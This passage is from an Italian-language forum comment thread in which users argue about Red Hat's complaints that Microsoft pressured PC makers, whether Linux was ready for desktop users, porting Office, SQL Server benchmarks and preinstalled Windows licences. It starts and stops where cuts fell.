      2)La possibilità di avere consulenza e
      assistenza. In italiano. Linux non lo fa
      ancora.Falso. Esistono parecchie società che fanno assistenza su Linux. Nella mia cittàc'è un punto assistenza Redhat.
      3)Un parco software ad ampio respiro e
      facilmente reperibile. Linux non c'è l'ha
      ancora.Falso. Il parco software di Linux èsenz'altro meno ampio di quello di Windows ma è già abbastanza ampio.E trovi tutto con facilità, sia suriviste che comprandoti una distribuzioneda poche decine di euro. Ovviamentetrovi tutto si internet.
      Facilmente con un click. Capiscimi eh...Francamente anche con Linux puoi fare parecchie cose con un click ...praticamente tutte le cose che devefare un utente base.
      Se invece devi divertirti un po di piu usa
      Linux
      Ma anche un'azienda (grossa non la piccola
      azienda) ha bisogno di un sistema di mercato
      (consulenti ecc ecc) che Linux e il suo
      mondo non puo ancora fornire.Falso anche questo. Consulenti Linux cisono eccome, anche in Italia.Sfoglia le pagine gialle della tua città.Saluti
  • Anonimo scrive:
    Re: Sono tutte cavolate
    - Scritto da: Tux
    Premetto che non sono un fanatico di Bill
    Gates, ma certo non me la sento di dare
    torto a Dell, IBM, Compaq etc...Non faccio commenti di nessun tipo, ma cito una esperienza da poco avuta...Sono da poco passato da un Athlon 1000 a un 1800+. Ovviamente ho cambiato scheda madre...C'era installato un multi-boot con una Slack e un win2k pro.Cambio M/B, CPU e RAM. Riattacco tutto, dò corrente.Ok, lancio linux. Avvio quasi ok. Un errore nel caricamento del modulo USB mi dice: "ehi, hai un controller USB diverso dall'ultima volta... che faccio? così non va ve'?" compilo il modulo per quest'altro controller. Modprobe a runtime, non ho nemmeno bisogno di riavviare...E il sistema parte. Finita installazione.Win2k: una schermata in 640*480*16col mi fa entrare nel sistema. La scheda video rifiuta di andare. Poco male, reinstallo i driver. La scheda audio gracchia. Reinstallo i driver: cambia una sega... Ho provato con 4 (quattro...) driver diversi e non gliene frega nulla.Mi sa che stasera lo spiano, m'ha rotto i kugeln... (come si fa la dieresi???)
  • Anonimo scrive:
    Re: Sono tutte cavolate
    In realtà non dovrebbero offrire solo linux, ma darlo almeno come alternativa a chi non vuole pagare la licenza di windows... non far pagare alla gente quello che tanto poi cancella... se non voglio windows devo essere libero di non acquistarlo, e non trovare la licenza obbligatoriamente legata alla macchina che compro...
  • Anonimo scrive:
    centesimo rosso che c vorrebbe dire??
    eh?
    • Anonimo scrive:
      Re: centesimo rosso che c vorrebbe dire??
      significa in pratica "questi comunisti vogliono soldi".
      • Anonimo scrive:
        Re: centesimo rosso che c vorrebbe dire??
        - Scritto da: Vertigo
        significa in pratica "questi comunisti
        vogliono soldi".Non mi risulta che in RH siano comunisti ne una associazione senza scopo di lucro!I soldoni li vogliono!!!!
    • Anonimo scrive:
      Re: centesimo rosso che c vorrebbe dire??
      - Scritto da: cosa significa
      eh?Significa "soldi di Red Hat"in analogia con la traduzionedel nome "cappello rosso"
  • Anonimo scrive:
    lotta ai monopolisti imperialisti
    Solo dei ragazzini ignoranti e manageresaltati possono scegliere volontariamentedi abbracciare l'imperialismo di microsoft, abbindolati dal marketing.Chi parla male di linux non l'ha mai utilizzato.L'ignoranza dilaga, in TV non c'e`cultura,si riduce la spesa per la ricerca scientificae nessuno dice niente, mentre se un calciatore ultrapagato canna un tiro scoppianoputiferi, sprange, scazzottamenti, danni...italiani, siamo un popolo di ignoranti,abbiamo politici ignoranti, ce lo meritiamo,io vorrei sapere con questi presuppostiquanto puo` essere oculata la scelta di regalare i dati dei ministeri dellapubblica amministrazione alla micro$oftin cambio di tangenti.Pian pianino i grossi capitali sono riusciti a mettere fuori usoanche Di Pietro, hanno smantellatoil pool di mani pulite, e ci culliamonelle false statistiche della forrestersenza renderci conto che in quasi tutti i PC italiani NON C'E` software italiano,in piccola parte forse c'e` europeo,e se micro$$$oft decide di triplicareil prezzo di office noi italiani siamochinati a 90 gradi pronti a farci sodomizzareovviamente pagando con i soldi pubblici.Manca la competenza, la gente usa micro$oftperche` e` stupida, ignorante, nonha e non vuole avere la competenza necessariafosse solo per distinguere tra un virused un malfunzionamento di un programma.Pochi qui si rendono contodi cosa voglia dire che Micro$$oft detieneil copyright dei formati proprietari dei LORO datiIGNORANTI IGNORANTI IGNORANTI Pino Silvestre
    • Anonimo scrive:
      Re: lotta ai monopolisti imperialisti
      Son sante siffatte parole!Amen.
    • Anonimo scrive:
      Re: lotta ai monopolisti imperialisti
      Grazie per averci dimostrato che esistono ancora i frustrati.- Scritto da: Pino Silvestre
      Solo dei ragazzini ignoranti e manager
      esaltati possono scegliere volontariamente
      di abbracciare l'imperialismo di microsoft,
      abbindolati dal marketing.

      Chi parla male di linux non l'ha mai
      utilizzato.

      L'ignoranza dilaga, in TV non c'e`cultura,
      si riduce la spesa per la ricerca scientifica
      e nessuno dice niente, mentre se un
      calciatore ultrapagato canna un tiro
      scoppiano
      putiferi, sprange, scazzottamenti, danni...

      italiani, siamo un popolo di ignoranti,
      abbiamo politici ignoranti, ce lo meritiamo,
      io vorrei sapere con questi presupposti
      quanto puo` essere oculata la scelta di
      regalare i dati dei ministeri della
      pubblica amministrazione alla micro$oft
      in cambio di tangenti.

      Pian pianino i grossi capitali
      sono riusciti a mettere fuori uso
      anche Di Pietro, hanno smantellato
      il pool di mani pulite, e ci culliamo
      nelle false statistiche della forrester
      senza renderci conto che in quasi tutti
      i PC italiani NON C'E` software italiano,
      in piccola parte forse c'e` europeo,
      e se micro$$$oft decide di triplicare
      il prezzo di office noi italiani siamo
      chinati a 90 gradi pronti a farci sodomizzare
      ovviamente pagando con i soldi pubblici.

      Manca la competenza, la gente usa micro$oft
      perche` e` stupida, ignorante, non
      ha e non vuole avere la competenza necessaria
      fosse solo per distinguere tra un virus
      ed un malfunzionamento di un programma.

      Pochi qui si rendono conto
      di cosa voglia dire che Micro$$oft detiene
      il copyright dei formati proprietari dei
      LORO dati

      IGNORANTI IGNORANTI IGNORANTI

      Pino Silvestre
  • Anonimo scrive:
    Re: Sono tutte cavolate
    - Scritto da: Tux

    Immagino già il calo delle vendite dei loro
    PC nel caso vendessero i loro computer con
    sopra installato Linux.Sicuramente la RH non si aspetta che la Dell venda le sue macchine con _solo_ Linu preinstallato, ma si lamenta che non ci sia neppure la possibilita' di avere un sistema in dual boot !Personalmente sono un SuSE-fanatico :), ma i servers Dell acquistati dalla mia ditta con Linux RH preinstallato funzionavano egregiamente !
    La realtà, e sono obiettivo, è che Linux non
    è ancora pronto... ci sono ancora TROPPE
    cose da risolvere nell'interfaccia utente
    (parlo della GUI) e nell'installazione (che
    richiede un livello di conoscenza
    medio-alto).Vero, pero' dateci la possibilita' di scegliere ! Dopo quasi 6 mesi di battaglie, sono riuscito a farmi rimborsare _parzialmente_ il software preinstallato sul mio Dell Inspiron 8100. Se calcolo le ore spese nello spedire lettere e EMail, mi conveniva tenermi la licenza di WinME (Mai usata) nonostante sulla macchina giri Linux.
  • Anonimo scrive:
    "Anni di ricerca e sviluppo"...
    ...per fare il porting di Office sotto Linux? A parte il fatto che basterebbero Word ed Excel (voglio proprio vedere chi sarebbe quel folle che userebbe Access col pinguino) ma se per fare un misero porting ci mettono così tanto allora per sviluppare una nuova versione quanto ci mettono, un'era glaciale?Ah, forse è per questo che da Office 95 ad oggi è cambiato solo il colore delle toolbar e poco altro...
    • Anonimo scrive:
      Re:

      Ah, forse è per questo che da Office 95 ad
      oggi è cambiato solo il colore delle toolbar
      e poco altro...dimentichi l'integrazione con il sistema operativo e con internet explorer...word fra un po fara anche un browser e un file manager...
      • Anonimo scrive:
        Re:
        - Scritto da: blah

        Ah, forse è per questo che da Office 95 ad

        oggi è cambiato solo il colore delle
        toolbar

        e poco altro...
        dimentichi l'integrazione con il sistema
        operativo e con internet explorer...word fra
        un po fara anche un browser e un file
        manager...Dove sei vissuto fin'ora? E' *gia'* cosi'.Saluti
    • Anonimo scrive:
      dehehe!
      - Scritto da: Ender
      ci mettono così tanto allora per sviluppare
      una nuova versione quanto ci mettono, un'era
      glaciale?ovviamente non sai che linux e' un sistema libero e quindi ha bisogno di un periodo di riadattamento per accettare office altrimenti c'e' il rigetto e quindi la soluzione e' dare office sotto gpl e aspettare che la grande comunita' linux faccia il port come sempre
    • Anonimo scrive:
      Re:
      - Scritto da: Ender
      ...per fare il porting di Office sotto
      Linux? A parte il fatto che basterebbero
      Word ed Excel (voglio proprio vedere chi
      sarebbe quel folle che userebbe Access col
      pinguino) ma se per fare un misero porting
      ci mettono così tanto allora per sviluppare
      una nuova versione quanto ci mettono, un'era
      glaciale?Forse il vero problema non e' il porting di Word o Excel, ma di cio' che ci sta attorno.Ad esempio, hanno problemi per fare il porting del "Blue Screen of Death".Inoltre non e' molto bene implementata quella funzione che permette al sistema di crashare assieme a Word, credo che sotto Windows si chiami "integrazione col sistema operativo".Mi hanno detto che sotto Linux il sistema ha la cattiva tendenza a rimanere impassibile di fronte agli eventuali crash delle applicazioni, e non costringe a riavviare. Cio' e' male! ^__^
      Ah, forse è per questo che da Office 95 ad
      oggi è cambiato solo il colore delle toolbar
      e poco altro...Non e' vero!E' cambiato il formato dei file, ad ogni versione vengono opportunamente rimescolate tutte le specifiche per far si che tutti i documenti scritti con W95 non siano apribili con W2k o WXP e viceversa.Cosi' tutti hanno la "possibilita" di aggiornarsi!!!E' un lavoro lungo, e richiede i suoi tempi! ^__^
    • Anonimo scrive:
      Re:
      - Scritto da: Ender
      ...per fare il porting di Office sotto
      Linux? Occorrerebbe in primo luogo avere una UI consistente con quella prevista da Office (ossia Windows). Poi occorrerebberotutte le API di Windows che Office usa.Quindi occorrerebbe modificare la gestionedei processi di linux per renderla similea quella di Windows, integrare dentroLinux Internet Explorer (dato che il motore di rendering html di IE viene usato pesantemente in tutte le applicazioni Microsoft). Implementare il DOM XML di Microsoft su Linux, una spruzzatina di MAPI e alla fine cosa avremmo?Un Linux che funziona esattamente come Windows.Ha senso una cosa del genere?
    • Anonimo scrive:
      Re:
      - Scritto da: Ender
      ...per fare il porting di Office sotto
      Linux? A parte il fatto che basterebbero
      Word ed Excel (voglio proprio vedere chi
      sarebbe quel folle che userebbe Access col
      pinguino) ma se per fare un misero portingMisero porting (!)
      ci mettono così tanto allora per sviluppare
      una nuova versione quanto ci mettono, un'era
      glaciale?Mozilla è stato rilasciato open a Marzo 97(mi sembra di ricordare) eppure di definitivo non è ancora uscito nulla.
      • Anonimo scrive:
        Re:
        - Scritto da: Marco

        Mozilla è stato rilasciato open a Marzo
        97(mi sembra di ricordare)Mese giusto, anno sbagliato (98)
        eppure di
        definitivo non è ancora uscito nulla.Mozilla è stato _sviluppato_ a partire da quei sorgenti non si tratta di porting, se vuoi fare un confronto prendi Netscape 4.5 e Mozilla 0.9.9 e vedi il lavoro che è stato fatto in questi anni.
      • Anonimo scrive:
        Re:
        e perché non ti fai un giro su www.mozilla.org ?così, tanto per aggiornarti un po'!ciaogodz
  • Anonimo scrive:
    Re: Sono tutte cavolate
    Non provi Linux dalla versione 1.0 di RedHat o cosa????? Non è molto più difficile di Windows, anzi, sotto certi punti di vista è più facile.Ma a parte questo. Ibm può vendere quello che vuole, da Mac a Unix Hp. Ovviamente al principiante non consiglierà Hp, ma POTRA' SCEGLIERE.Io se vedo una mela marcia dal fruttivendolo non mi sento obbligato a comprarla. Ne scelgo un'altra e il problema è risolto. Non dico mai "le mele del mio fruttivendolo non funzionano", caso mai mi dico "sono un cretino" perchè ne ho comprata una marcia.
  • Anonimo scrive:
    Re: Sono tutte cavolate
    piccoli problemi... a me sembra che windows ne crei monti di piu e molto piu' grossi...
  • Anonimo scrive:
    Aveta fatto confusione
    Era Gateway quello che ha detto che M$minacciava d non pagargli più la pubblicitàse avessero venduto macchine con Linux.Red hat ha detto che Linux non ha potutorappresentare una alternativa perchèMicrosoft non ha sviluppato una versionedi Office e di Internet Explorer per Linux.Se ne desumono due cose:1) M$ paga la pubblicità ai costruttori di PC2) A Linux servono M$ Office e M$ Internet Explorer. Ma Netscape? Opera? Mozilla? StarOffice?OpenOffice? AbigeatoWord?
    • Anonimo scrive:
      Re: Aveta fatto confusione
      Ma Netscape? Mozilla?StarOffice? OpenOffice? Sarà forse per il fatto che questi prog sono penosi?
      • Anonimo scrive:
        Re: Aveta fatto confusione
        - Scritto da: Matteo
        Ma Netscape? Mozilla?
        StarOffice? OpenOffice?

        Sarà forse per il fatto che questi prog sono
        penosi?
        Talmente penosi che molti gli utilizzano anche sotto Windows....
        • Anonimo scrive:
          Re: Aveta fatto confusione
          - Scritto da: TeX
          Talmente penosi che molti gli utilizzano
          anche sotto Windows....liel'havevo gia' dettho io ma non mi a creduto!!
          • Anonimo scrive:
            Re: Aveta fatto confusione
            - Scritto da: Pogoboy
            - Scritto da: TeX


            Talmente penosi che molti gli utilizzano

            anche sotto Windows....

            liel'havevo gia' dettho io ma non mi a
            creduto!!Già.... Ho premuto "Invia" troppo presto e "Stop" troppo tardi ....... e il post era già partito.... :-(
      • Anonimo scrive:
        Re: Aveta fatto confusione
        - Scritto da: Matteo
        Ma Netscape? Mozilla?
        StarOffice? OpenOffice?

        Sarà forse per il fatto che questi prog sono
        penosi?Mozilla è MOOOLTO meglio di IE. Provare per credere.
      • Anonimo scrive:
        Re: Aveta fatto confusione
        - Scritto da: Matteo
        Ma Netscape? Mozilla?
        StarOffice? OpenOffice?

        Sarà forse per il fatto che questi prog sono
        penosi?a questo punto ho una curiosita'...sapresti trovarmi un programma microsoft che ha un corrispondente non microsoft che a tuo parere e' migliore dell'implementazione microsoft ?
        • Anonimo scrive:
          Re: Aveta fatto confusione

          a questo punto ho una curiosita'...
          sapresti trovarmi un programma microsoft che
          ha un corrispondente non microsoft che a tuo
          parere e' migliore dell'implementazione
          microsoft ?Tutti i programmi definiti server:Exchange, SQL Server, ISA, IIS, ectDa qui la distinzione che ho sempre fatto: Client -
          MicrosoftServer -
          Unix (quindi anche Linux)
          • Anonimo scrive:
            Re: Aveta fatto confusione
            - Scritto da: Matteo

            a questo punto ho una curiosita'...

            sapresti trovarmi un programma microsoft
            che

            ha un corrispondente non microsoft che a
            tuo

            parere e' migliore dell'implementazione

            microsoft ?

            Tutti i programmi definiti server:

            Exchange,E che cosa al posto? Un server POP3? Che fa solo posta? Ma per favore!
            SQL Server,http://www.tpc.org/tpcc/results/tpcc_perf_results.asphttp://www.tpc.org/tpcc/results/tpcc_price_perf_results.aspSQL Server è primo sia come prestazioni che come prezzo/prestazioni.http://mktnews.nasdaq.com/newsv2/pullstory_nasd.asp?textpath=d:\www\nasdaq\news\pr\2002\03\22\PR20020322-0900-SFF014-0.html&usymbol=MSFTInoltre ha vinto per il secondo anno di fila il premio per prestazioni, affidabilità e soluzioni disponibili.
            ISA, Opinabile, ma meno delle altre due affermazioni.
            IIS,Infatti è il secondo come utilizzo sui siti in internet ed è il più utilizzato all'interno delle prime 100 aziende del Fortune 500.
          • Anonimo scrive:
            Re: Aveta fatto confusione


            E che cosa al posto? Un server POP3? Che fa
            solo posta? Ma per favore! Domino + notes ... purtroppo oggi in disarmo!

            SQL Server,
            http://www.tpc.org/tpcc/results/tpcc_perf_res

            http://www.tpc.org/tpcc/results/tpcc_price_pe

            SQL Server è primo sia come prestazioni che
            come prezzo/prestazioni.
            Inoltre ha vinto per il secondo anno di fila
            il premio per prestazioni, affidabilità e
            soluzioni disponibili.Sappiamo tutti che la piattaforma PC è moooolto meno costosa di piattaforma proprietarie.Inoltre SQL Server è primo in prestazioni grazie a configurazioni in cluster!Immagina un cluster di HP 9000 SuperDome o Di Sun Starfire che tipo di prestazioni potrebbero avere ( ti concedo ad un costo esorbitante!)Quindi sostieni che architetturalmente SQL Server è il miglior DB Server presente oggi sul mercato???

            IIS,

            Infatti è il secondo come utilizzo sui siti
            in internet ed è il più utilizzato
            all'interno delle prime 100 aziende del
            Fortune 500.Secondo questo ragionamento Windows vale 10000 volte Linux Ma sappiamo che non è vero!
          • Anonimo scrive:
            Re: Aveta fatto confusione
            - Scritto da: Matteo




            E che cosa al posto? Un server POP3? Che
            fa

            solo posta? Ma per favore!

            Domino + notes ... purtroppo oggi in
            disarmo!Tu l'hai detto (visto che siamo nella settimana Santa calza bene).E' un peccato, ma Notes è stato ucciso da IBM.



            SQL Server,


            http://www.tpc.org/tpcc/results/tpcc_perf_res




            http://www.tpc.org/tpcc/results/tpcc_price_pe



            SQL Server è primo sia come prestazioni
            che

            come prezzo/prestazioni.



            Inoltre ha vinto per il secondo anno di
            fila

            il premio per prestazioni, affidabilità e

            soluzioni disponibili.

            Sappiamo tutti che la piattaforma PC è
            moooolto meno costosa di piattaforma
            proprietarie.E' uno svantaggio?
            Inoltre SQL Server è primo in prestazioni
            grazie a configurazioni in cluster!Anche qui: è uno svantaggio? Lo sappiamo tutti che, per quanto pompato, un singolo server su qualunque piattaforma alla fine scala meno di un cluster.Se poi guardi la configurazione del non-cluster vincente è pazzesca: 128 CPU a 64bit, 12M$ di prezzo, e arriva a circa 2/3 delle transazioni fatte da un cluster con 272 Pentium (32bit) che costano 10M$.

            Secondo questo ragionamento Windows vale
            10000 volte Linux Ma sappiamo che non è
            vero!Ah no?
          • Anonimo scrive:
            Re: Aveta fatto confusione




            Secondo questo ragionamento Windows vale

            10000 volte Linux Ma sappiamo che non è

            vero!

            Ah no? Attento che ti sbranano!! ;-))))
          • Anonimo scrive:
            Re: Aveta fatto confusione


            Domino + notes ... purtroppo oggi in

            disarmo!

            Tu l'hai detto (visto che siamo nella
            settimana Santa calza bene).

            E' un peccato, ma Notes è stato ucciso da
            IBM.o da geni dell'ufficio aquisti che pensano che esiste solo m$ al mondo...

            Sappiamo tutti che la piattaforma PC è

            moooolto meno costosa di piattaforma

            proprietarie.

            E' uno svantaggio?aspetta, ms*.* entrara anche in questo mercato prima o poi...calma...

            Inoltre SQL Server è primo in prestazioni

            grazie a configurazioni in cluster!

            Anche qui: è uno svantaggio? Lo sappiamo
            tutti che, per quanto pompato, un singolo
            server su qualunque piattaforma alla fine
            scala meno di un cluster.si ma detto cosi e piu performante e troppo il migliore, ecc...
            Se poi guardi la configurazione del
            non-cluster vincente è pazzesca: 128 CPU a
            64bit, 12M$ di prezzo, e arriva a circa 2/3
            delle transazioni fatte da un cluster con
            272 Pentium (32bit) che costano 10M$.ah bhe, piu del DOPPIO di cpu...e se non ci fosse amd, stai tranquillo che non costavano solo 10m$...

            Secondo questo ragionamento Windows vale

            10000 volte Linux Ma sappiamo che non è

            vero!

            Ah no? macche 10000 volte...almeno un milliardo di volte meglio, e sarebbe ancora poco...o no ????
          • Anonimo scrive:
            Re: Aveta fatto confusione
            - Scritto da: blah

            E' un peccato, ma Notes è stato ucciso da

            IBM.
            o da geni dell'ufficio aquisti che pensano
            che esiste solo m$ al mondo...



            E' uno svantaggio?
            aspetta, ms*.* entrara anche in questo
            mercato prima o poi...calma...Veramente ci è già entrata. La vendita di SQL Server cresce del 25% ogni anno e la versione enterprise dell'80%.



            Se poi guardi la configurazione del

            non-cluster vincente è pazzesca: 128 CPU a

            64bit, 12M$ di prezzo, e arriva a circa
            2/3

            delle transazioni fatte da un cluster con

            272 Pentium (32bit) che costano 10M$.
            ah bhe, piu del DOPPIO di cpu...e se non ci
            fosse amd, stai tranquillo che non costavano
            solo 10m$...Certo più del doppio di CPU a 32 bit con un costo inferiore.Scusa ma se cerco di venderti un'auto che costa meno e va i 2/3 in più di una che costa di più tu quale compri?
          • Anonimo scrive:
            Re: Aveta fatto confusione


            aspetta, ms*.* entrara anche in questo

            mercato prima o poi...calma...

            Veramente ci è già entrata. La vendita di
            SQL Server cresce del 25% ogni anno e la
            versione enterprise dell'80%.dicevo l'hardware...minchia che dati pero 80%, evvai col bonus ai commerciali...80%...100 venduti quest'anno, 80% 180 venduti fino al secondo anno+ 144 = 324...minchia vendite piu triplicate in un paio d'anni...dovrebbero darsi all'economia...
            Certo più del doppio di CPU a 32 bit con un
            costo inferiore.

            Scusa ma se cerco di venderti un'auto che
            costa meno e va i 2/3 in più di una che
            costa di più tu quale compri?non c'e solo questo da considerare in una macchina...magari quel 1/3 di potenza in piu non lo sfrutterei mai...e magari la macchina dura di piu rispetto all'altra, che tirata al massimo per i cappelli se ne va...
          • Anonimo scrive:
            Re: Aveta fatto confusione
            - Scritto da: blah

            Scusa ma se cerco di venderti un'auto che

            costa meno e va i 2/3 in più di una che

            costa di più tu quale compri?
            non c'e solo questo da considerare in una
            macchina...magari quel 1/3 di potenza in piu
            non lo sfrutterei mai...e magari la macchina
            dura di piu rispetto all'altra, che tirata
            al massimo per i cappelli se ne va...L'altra macchina, come dici tu, è un DB federato spalmato su 34 advanced server a 8 processori l'uno messi in cluster a coppie. Questo significa che è intrinsecamente più affidabile di una macchina singola.
          • Anonimo scrive:
            Re: Aveta fatto confusione

            L'altra macchina, come dici tu, è un DB
            federato spalmato su 34 advanced server a 8
            processori l'uno messi in cluster a coppie.non ho nemmeno letto i test, ma suppongo che anche l'altro sia un sistema cluster, non un'unica macchina...
            Questo significa che è intrinsecamente più
            affidabile di una macchina singola.eggia...ho avuto certe esperienze con dei cluster apprentemente perfetti...non aggiungiamo altro...tutto si puo rompere o funzionare male...non e un esclusiva di qualcuno...
          • Anonimo scrive:
            Re: Aveta fatto confusione
            - Scritto da: blah

            L'altra macchina, come dici tu, è un DB

            federato spalmato su 34 advanced server a
            8

            processori l'uno messi in cluster a
            coppie.
            non ho nemmeno letto i test, ma suppongo che
            anche l'altro sia un sistema cluster, non
            un'unica macchina...Sbagli. E' una macchina singola: le prove sono di velocità non di affidabilità.
  • Anonimo scrive:
    Dubbi...
    Ora mi chiedo: esistono prove di quanto afferma Red Hat oppure è un modo per tentare di scardinare Microsoft? Non riesco a capire da che parte è la verità.
    • Anonimo scrive:
      Re: Dubbi...
      - Scritto da: Barbara
      Ora mi chiedo: esistono prove di quanto
      afferma Red Hat oppure è un modo per tentare
      di scardinare Microsoft? Non riesco a capire
      da che parte è la verità.Non so se ci siano prove, ma la questione della Dell non è la prima volta che salta fuori.....
      • Anonimo scrive:
        Re: Dubbi...
        - Scritto da: TeX


        - Scritto da: Barbara

        Ora mi chiedo: esistono prove di quanto

        afferma Red Hat oppure è un modo per
        tentare

        di scardinare Microsoft? Non riesco a
        capire

        da che parte è la verità.

        Non so se ci siano prove, ma la questione
        della Dell non è la prima volta che salta
        fuori.....La questione di DELL e' attualmente dibattuta in tribunale all'interno della causa antitrust promossa da alcuni stati USA.Il punto fondamentale non e' che M$ abbia fatto accordi di esclusivita' (io ti do il mio SO a prezzo stracciato e tu non avrai altro SO al di fuori del mio) ma che abbia imposto l'esclusivita' sfruttando la posizione dominante.
    • Anonimo scrive:
      Re: Dubbi...
      verità o no se la quasi totalità del mercato utenza richiede Win per compatibilità dei vari software, ne esce un monopolio, ovvio che l'entità dominante esercita pressione sui distributori per bloccare la concorrenza.Trova un concessionario Fiat che 15 anni fa potesse avere anche un mandato concorrente, quasi impossibile, oggi invece, venuta meno o praticamente azzerata la dominanza.... alla fine è sempre questione di mercato che stupido non è ma molto "interessato".Uso Win per la compatibilità e semplicità, uso Linux per simpatia ed entrambe hanno diritto ad esiste, entrambe agiranno o si lamenteranno l'una dell'altra.
  • Anonimo scrive:
    Vergogna!!
    Passare alle minacce per paura di affondare... Si sono resi conto che il loro impero sta tremando e fanno la voce grossa...Avete sentito che uscirà XP se? Ma come, non era perfetto!
    • Anonimo scrive:
      Re: Vergogna!!
      - Scritto da: MDK
      Passare alle minacce per paura di
      affondare... Si sono resi conto che il loro
      impero sta tremando e fanno la voce
      grossa...
      Avete sentito che uscirà XP se? Ma come, non
      era perfetto!Perchè allora è uscito Mandrake 8.2 (solo un esempio, vale x tutte le distribuzioni)? Non è un SO perfetto?
      • Anonimo scrive:
        Re: Vergogna!!
        - Scritto da: decoder


        - Scritto da: MDK

        Passare alle minacce per paura di

        affondare... Si sono resi conto che il
        loro

        impero sta tremando e fanno la voce

        grossa...

        Avete sentito che uscirà XP se? Ma come,
        non

        era perfetto!

        Perchè allora è uscito Mandrake 8.2 (solo un
        esempio, vale x tutte le distribuzioni)? Non
        è un SO perfetto? Perche' i software che mettono insieme al tutto (svariate centinaia) vengono aggiornati.....=)
        • Anonimo scrive:
          Re: Vergogna!!
          Eh. Già. Invece Windows no.- Scritto da: KILLALL


          - Scritto da: decoder





          - Scritto da: MDK


          Passare alle minacce per paura di


          affondare... Si sono resi conto che il

          loro


          impero sta tremando e fanno la voce


          grossa...


          Avete sentito che uscirà XP se? Ma
          come,

          non


          era perfetto!



          Perchè allora è uscito Mandrake 8.2 (solo
          un

          esempio, vale x tutte le distribuzioni)?
          Non

          è un SO perfetto?

          Perche' i software che mettono insieme al
          tutto (svariate centinaia) vengono
          aggiornati.....=)
      • Anonimo scrive:
        Re: Vergogna!!
        - Scritto da: decoder....
        Perchè allora è uscito Mandrake 8.2 (solo un
        esempio, vale x tutte le distribuzioni)? Non
        è un SO perfetto? Nulla è perfetto (tranne l'ultima versione di qualsiasi sw M$...) ma tutto e migliorabile. Compreso Mdk 8.2 (visto soprattutto le due serate che ho dovuto trascorrere, scomodando tutti i santi del paradiso, per farlo funzionare dopo che avevo aggiornato il sistema dalla Mdk 8.1 .....)
    • Anonimo scrive:
      Re: Vergogna!!
      - Scritto da: MDK
      Avete sentito che uscirà XP se? Ma come, non
      era perfetto!solo una domanda;tu usi XP? Cioe'.. lo conosci, lo hai usato per lavorare, giocare o fare quel che fai a lungo al punto di poterne parlare oppure il tuo era un intervento estemporaneo come un brufolo da scoppiare?
      • Anonimo scrive:
        Re: Vergogna!!

        solo una domanda;
        tu usi XP? Io, per esempio, l'ho installato. E' durato giusto un giorno. tanto per cominciare ho impiegato quasi un'ora (o forse più) per la sola installazione, contro i normali 20 minuti (comprensivi di aggiornamento dei driver) per win98. Vabbè...Il boot era lentissimo, almeno il doppio di win98. Vabbè...Non erano compatibili, ahimè, i driver della scheda video (una Nvidia 32mb TNT2), lo scanner parallelo, e il modem. Vabbè...Io col computer, oltre a smanettare, ci lavoro e uso Visual Basic, Borland C e altre cosucce. Inutile dire che i 'vecchi' programmi di compilazione 'non erano adatti al nuovo sistema operativo'... Vabbè...Per poter usufruire di driver compatibili avrei dovuto collegarmi al sito microsoft e scaricare gli aggiornamenti... Ma come facevo se il modem non aveva i driver? Vabbè...L'ho provato giusto una giornata per capire cosa avrebbe potuto offrirmi di più rispetto al win98 con le mie necessità.Finita la prova l'ho disinstallato senza pentimento. Che si attacchino. Un computer deve risolvere I MIEI PROBLEMI, non quelli economici di Bill...
        • Anonimo scrive:
          Re: Vergogna!!

          Io, per esempio, l'ho installato. E' durato
          giusto un giorno. se hai un computer vecchio e' giusto che usi un OS vecchio.Monta la Mandrake 8.0 su un 486. con Gnome e StarOffice e poi parliamone.Se hai un computer nuovo e molta ram allora non usare XP e' un suicidio.Se usi un pc vecchio, e periferiche vecchie, non puoi pretendere che funzionino senza driver.3dfx ad esempio non rilascia driver da anni e allora? cosa dovrebbero fare i sistemi operativi? non andare avanti perche' la 3dfx e' fallita?Win98 rimane un gran sistema ma per un computer nuovo e' insufficiente e obsoleto (ha 5 anni!) ma serve davvero dirlo?Come puoi pretendere che un sistema nato per computer nuovi e veloci funzioni col tuo catorcio ? :))))))))))))ciao!
      • Anonimo scrive:
        Re: Vergogna!!
        - Scritto da: Zot!
        - Scritto da: MDK

        Avete sentito che uscirà XP se? Ma come,
        non

        era perfetto!

        solo una domanda;

        tu usi XP?

        Cioe'.. lo conosci, lo hai usato per
        lavorare, giocare o fare quel che fai a
        lungo al punto di poterne parlare oppure il
        tuo era un intervento estemporaneo come un
        brufolo da scoppiare? Un brufolo da scoppiare? Bhè, non mi metto nemmeno a discutere... rimani chiuso nel buio del tuo sistema e lotta contro i mulini a vento... intanto arrichisci zio Bill!
  • Anonimo scrive:
    Acquirenti, sveglia!!!
    Non comprate le offerte con tutti i software in bundle!E' un bidone! Vi sembra di fare un affare e poi scoprite che:* non vi danno il cd dei s.o. che comprate* questi software stanno su una partizione a parte (così col cavolo che sfruttate tutto il disco fisso che avete comprato* l'assistenza fa pena perché non si capisce se la fa il venditore o M$* Vi rifilano hardware di pessima qualitàVale la pena comprare una cosa del genere?Scegliete l'hardware giusto e il softwae giusto, non fatevi fregare.Se la gente comprasse in questo modo non ci sarebbero i windowspreinstallati e col cavolo che M$ potrebbe fare pressione suivenditori....
    • Anonimo scrive:
      Re: Acquirenti, sveglia!!!
      - Scritto da: fDiskolo
      * non vi danno il cd dei s.o. che comprate
      * questi software stanno su una partizione
      a parte (così col cavolo che
      sfruttate tutto il disco fisso che avete
      compratoE' vero, queste sono 2 cose agghiaccianti!!! Se ti si rompe l'hard disk, oltre che comprarne uno nuovo devi riacquistare anche il sistema operativo...
    • Anonimo scrive:
      Re: Acquirenti, sveglia!!!
      - Scritto da: fDiskolo
      Non comprate le offerte con tutti i software
      in bundle!

      E' un bidone! Vi sembra di fare un affare e
      poi scoprite che:

      * non vi danno il cd dei s.o. che comprate
      * questi software stanno su una partizionePurtroppo molti considerano un pc come un'eletrodomestico, un forno a microonde.Be', quando impareranno...CiaoFabio
      • Anonimo scrive:
        Re: Acquirenti, sveglia!!!
        Il PC DEVE diventare diffuso e semplice come un forno o come qualsiasi altro elettrodomestico. Perché continuate a pensare che debba essere considerato una macchina per soli "addettiai lavori"? - Scritto da: Fabio


        - Scritto da: fDiskolo

        Non comprate le offerte con tutti i
        software

        in bundle!



        E' un bidone! Vi sembra di fare un affare
        e

        poi scoprite che:



        * non vi danno il cd dei s.o. che comprate

        * questi software stanno su una
        partizione

        Purtroppo molti considerano un pc come
        un'eletrodomestico, un forno a microonde.
        Be', quando impareranno...
        Ciao
        Fabio
        • Anonimo scrive:
          Re: Acquirenti, sveglia!!!
          - Scritto da: Un addetto ai lavori
          Il PC DEVE diventare diffuso e semplice come
